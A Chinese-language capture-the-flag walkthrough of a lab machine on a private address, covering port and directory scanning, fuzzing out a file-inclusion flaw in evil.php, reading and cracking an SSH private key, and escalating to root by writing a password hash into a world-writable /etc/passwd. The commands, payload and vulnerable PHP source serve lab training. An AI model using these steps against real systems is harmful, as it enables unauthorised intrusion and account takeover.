文章目录
- 信息搜集
- 网页渗透
- 提权
- 总结
前言
目前网络安全越来越受到国家的重视,你可以通过本次黑盒的学习,学习到一些关于网络安全的知识,希望对您有所帮助!
提示:以下是本篇文章正文内容,下面案例可供参考
一、信息搜集
首先进行IP扫描
让我们看看看他开启了哪些端口
nmap -sC -sV 192.168.181.157 -p- -v --min-rate=20000
由于80端口打开,于是进行网页访问
于是进行目录扫描
gobuster dir -r -u http://192.168.181.157/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,bak,html
于是我发现7/secret下是一个空文件,于是我再次对他进行扫描
gobuster dir -r -u http://192.168.181.157/secret/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,bak,html
我只能搜集到这些信息,我也没地可以去,于是我进行模糊测试
ffuf -c -r -u 'http://192.168.181.157/secret/evil.php?FUZZ=/etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/common.txt -fs 0
于是command是可以运行的,我还发现他是LFI漏洞
二、网页渗透
参考 https://book.hacktricks.xyz/pentesting-web/file-inclusion
于是我进行查看evil.php的源码
php://filter/convert.base64-encode/resource=evil.php
这是一段base64,于是进行破解
<?php
$filename = $_GET['command'];
include($filename);
?>
我又在/home/mowree/.ssh/authorized_keys下发现一个公钥,那么我是不是可以使用私钥进行登录呢
于是经他复制到本机,那么我们要生成哈希值,于是用到了ssh2john.py,在https://github.com/aniello001/ssh2john进行下载
./ssh2john.py /root/id-rsa > hash
生成哈希值后,进行破解
john hash /usr/share/wordlists/rockyou.txt
于是进行ssh登录
chmod 600 id-rsa
ssh mowree@192.168.181.157 -i id-rs
于是获得第一个flag
三、进行提权
于是我发现 /etc/passwd有666的权限,于是进行查看
因为x表示在/etc/passwd下是用户名密码的存在,于是我们删除x,看看是否可以提权
好像不可以,于是我们生成一个哈希值来替换x
openssl passwd -1
我生成的密码是root,于是将他复制到/etc/passwd
于是我进行提权
于是获得最终的flag
总结
我了解到了openssl是一个SSL协议的开源实现,采用C语言作为开发语言,具备了跨平台的能力,支持Unix/Linux、Windows、Mac OS等多种平台。他使用OpenSSL的库,如VOIP的OpenH323协议、Apache服务器、Linux安全模块等等;以及新的解决思路。